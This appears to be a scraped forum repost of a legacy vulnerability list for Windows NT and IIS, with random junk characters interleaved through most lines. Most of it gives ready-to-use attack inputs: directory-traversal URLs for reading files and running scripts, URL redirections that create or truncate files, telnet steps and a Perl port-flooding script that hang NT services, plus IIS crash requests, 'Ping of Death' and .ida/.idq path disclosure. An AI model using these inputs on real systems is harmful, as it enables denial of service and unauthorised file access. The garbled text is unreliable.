受影響系統(tǒng):4.0,iis 1.0
! e7 B2 P& v2 N% pA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
4 ?/ j3 h2 y3 H9 C) E- U/ A5 t
2 X) C# h! b+ y9 g- ^' r/ tA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
- e; j5 h1 E3 F! f8 G$ T3 J
7 S% N7 d5 f. f, B% `7 Q) \By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.- Q2 d" t# c! O+ r7 Y" n2 d8 c7 M+ Z
+ |) D8 D0 |$ t' A9 @
--------------------------------------------------------------------& \- T$ ~9 E; w" e
' B5 F. S( q9 }受影響系統(tǒng):4.0
5 `8 K6 C6 a+ W9 t) IA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''., I, S' ~ `9 @8 ]4 q+ Y' P# {* k
2 K8 s4 e* w- {4 B0 H3 `% M- b5 u1 \
If the file 'target.bat' exists, the file will be truncated.
5 t: j0 g8 m2 A/ t+ g* Z' _2 @6 q- |$ B" G
5 f: M) u3 W; ]
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
' }! E& @( ?6 r% Z4 h# {8 C o$ ?, p9 M/ J; R) _
----------------------------------------------------------------------
" ?+ S2 W* Z; _0 n! h" m$ u
9 I4 q" S3 I) A# y# ?* |1 c受影響系統(tǒng):3.51,4.0( I5 `; H4 D0 [- j- s
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
- [( `7 v) f' M7 W: Q& S" d' Q9 E# Z# o C" _
The following steps;* p% ^/ d4 E: r
3 x5 d% D- X" l
Telnet to an NT 4.0 system on port 135
8 o2 m4 d* \# p5 E, ^Type about 10 characters followed by a <CR> / i4 E/ ^8 T5 L% [- S
Exit Telnet
/ A# t7 l: f( d/ Nresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
0 `4 ] x: D# G) |. Y, ]9 H9 P) v5 r, B- C1 C" C
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.6 g& P6 A" f0 O
# f9 S& {0 t1 e* T+ |' O( N7 MThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.. l8 _3 k( S- ]$ i, I
$ _. E# r. F) x2 L
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
, z4 c' O Y- c- ^8 t
5 g2 s/ s, I, j1 U. X+ x: jThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):$ u3 O4 s' Z/ I. q( H
9 A8 A0 q) q( T
/*begin poke code*/
5 l: A) ~! ?; ?$ z' i2 h) M
. ~* V, C9 h, E7 b' S k/ {$ {) Muse Socket;; z, m+ Y) w3 [( N4 T
use FileHandle;& M. \8 B) m4 M( @3 d% k) l6 X: Z; ]0 a
require "chat2.pl";- i1 r0 Z m/ z) b" ?7 o; `
+ o7 o' ]* f9 N1 c) @5 I( K$systemname = $ARGV[0] && shift;
; ?8 ?2 q9 g4 E0 ^! M$ y. c
# K- e7 z7 u3 m l: t$verbose = 1; # tell me what you're hitting3 O4 L% B$ |" }: v( K8 R$ J
$knownports = 1; # don't hit known problem ports8 p* Y1 H5 `3 C* L0 ]3 [( _
for ($port = $0; $port<65535; $port++) # |+ X' |6 n. e, L! G
{( X% U' I" H* P' N; h) p
; J9 B: o' ^4 F# s/ H: N6 R1 Y5 ~& l3 b- w( p J* R& E0 [$ Y
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
# t: W$ \1 {! y( L5 Q8 Onext;, r4 I P/ V; B' g
}$ K# U0 P* U* G9 a* o5 L4 C+ |' m
$fh = chat::open_port($systemname, $port);
. g o, Q- @+ A3 ?2 L" ?+ Lchat::print ($fh,"This is about ten characters or more");6 I& {6 F* A" A& b5 q% K1 J
if ($verbose) {: g( i+ @0 z2 H& q9 N- w
print "Trying port: $port\n";
5 I6 S* b% i+ T* `}
p" G) u' ~ h8 M! Mchat::close($fh);; p# f0 U6 {! D
+ |1 Y3 W8 f$ ~& k7 t+ ^; y
}2 M+ b8 S! n0 Q( {: ^% N; K
4 W* r$ n7 r5 J: |& m! T% l7 e. {
/*end poke code*/
1 ?1 x$ G/ L; O
4 Z, G/ P/ A8 x: D/ O- J6 LSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
* i$ p/ P& y" Q+ U" Y v. D
% t/ R1 J' n5 j% V- z- F# b0 I--------------------------------------------------------------------------------% K4 l$ W# w9 Q4 A8 \& @
) k- { H6 M7 g! X' U受影響系統(tǒng):4.0; y1 o$ C) c6 N k4 ^. n
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
$ {1 d+ g2 L! A, m
, V0 W# C( e7 Q7 h! BThis attack causes Dr. Watson to display an alert window and to log an error: 9 D% }& R1 [# R! z) C7 O: t
9 Z; E v6 j% V: Q* }) [+ K"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"4 z2 f# j2 _- }1 {& |
N, w% Q) k! e6 i- s! ]0 W--------------------------------------------------------------------------------
0 K+ ]+ T( m. o5 @( |* R& H2 `5 r# s
: C( |/ Y% E6 e3 _! ^4 p受影響系統(tǒng):3.51,4.09 e' j& Z Z" }' w( I" G1 M" _
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
; y& o/ ~) ]' ?+ b* A+ w8 {- N# T4 y- `) z3 f0 T/ e; `
STOP: 0X0000001E
- W7 ` B( [& F6 z7 NKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS* K- H) Q' I9 M1 k+ q3 M
0 X- H6 y0 a) j
-OR-& h" Q5 k1 {: w7 q! C
* \: U8 I8 Z1 d5 DSTOP: 0x0000000A- |( c& W4 ?5 G. ^( {8 L6 Z( a4 B* r
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
# ]- F5 C D8 x
/ E4 M( u; ` I3 r( T8 d' C X! s1 zNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
! q7 s, m X# O& m+ E. ^0 c0 H: g) X2 `
--------------------------------------------------------------------------------
1 h7 D: Z& d' }8 V% `; X
$ E* l1 ~# @ J8 o1 EMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). - s/ [+ s2 t& M* a
. B g& P, T( h# W--------------------------------------------------------4 Y( C7 P" q- A
. `) V3 d, E* \+ c/ ^% AIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |